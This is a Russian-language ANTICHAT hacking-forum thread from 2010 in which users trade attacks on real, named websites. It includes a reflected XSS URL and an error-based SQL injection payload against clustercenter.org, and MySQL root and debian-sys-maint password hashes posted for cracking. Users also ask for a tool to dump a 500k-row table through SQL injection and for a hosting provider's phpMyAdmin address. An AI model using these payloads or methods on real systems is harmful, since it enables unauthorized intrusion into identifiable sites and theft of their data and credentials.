HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14801  
Старый 19.08.2010, 13:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6079

Репутация: 9
По умолчанию

Lilo

в выводе ошибки мускула есть пассивная xss

Код:
Code:
http://clustercenter.org/login.php?return=/index/month/&category=alert("xss")'
 
Ответить с цитированием

  #14802  
Старый 19.08.2010, 13:21
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Lilo  
Lilo said:
http://clustercenter.org/login.php?return=/index/month/&category=1'
просто ошибка?
не крутится скуля такая?
пробывал у меня не вышло
_http://clustercenter.org/login.php?return=/index/month/&category=1'+or+(select+count(*)+from+(select+1+un ion+select+2+union+select+3)x+group+by+concat(vers ion(),floor(rand(0)*2)))+--+
 
Ответить с цитированием

  #14803  
Старый 19.08.2010, 13:56
Lilo
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме:
6183433

Репутация: 1521


По умолчанию

спасибо парни=) понял

плюсики кончились только=(
 
Ответить с цитированием

  #14804  
Старый 19.08.2010, 14:26
php_master
Новичок
Регистрация: 06.03.2010
Сообщений: 8
Провел на форуме:
14251

Репутация: 5
По умолчанию

Ребята, подскажите чем зашифрованы пароли в базе данных mysql.user если они имеют такой вид:

root

*6E8611756F31DE90B29395C382E276861503CB8B

debian-sys-maint

*0B749C627EED121EBC71FBFEE656100950D0C2E4
 
Ответить с цитированием

  #14805  
Старый 19.08.2010, 14:44
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

это MySQL5
 
Ответить с цитированием

  #14806  
Старый 19.08.2010, 14:50
KNOT
Новичок
Регистрация: 07.04.2010
Сообщений: 24
Провел на форуме:
351986

Репутация: 0
По умолчанию

Цитата:
Сообщение от php_master  
php_master said:
Ребята, подскажите чем зашифрованы пароли в базе данных mysql.user если они имеют такой вид:
root
*6E8611756F31DE90B29395C382E276861503CB8B
debian-sys-maint
*0B749C627EED121EBC71FBFEE656100950D0C2E4
root

*6E8611756F31DE90B29395C382E276861503CB8B

вот в этой теме расшифровка

расшифровка hash. Part3 (DES, MySQL, SHA-1)
 
Ответить с цитированием

  #14807  
Старый 19.08.2010, 18:16
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

каким скриптом\прогой лучше сдампить таблицу через sql-inj? записей около 500k

sipt и toolza на катят
 
Ответить с цитированием

  #14808  
Старый 19.08.2010, 18:41
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от .:[melkiy  
:."]
.:[melkiy]:. said:
каким скриптом\прогой лучше сдампить таблицу через sql-inj? записей около 500k
sipt и toolza на катят
Какая база?
 
Ответить с цитированием

  #14809  
Старый 19.08.2010, 18:44
katrik
Guest
Сообщений: n/a
Провел на форуме:
554

Репутация: 0
По умолчанию

подскажите адрес phpmyadmin хостинга logol.ru. Буду очень благодарен. Или же расскажите как узнавать адреса phpmyadmin? может скрипт есть какой то?
 
Ответить с цитированием

  #14810  
Старый 19.08.2010, 18:46
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Redwood  
Redwood said:
Какая база?
mysql 5.0.68-log
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ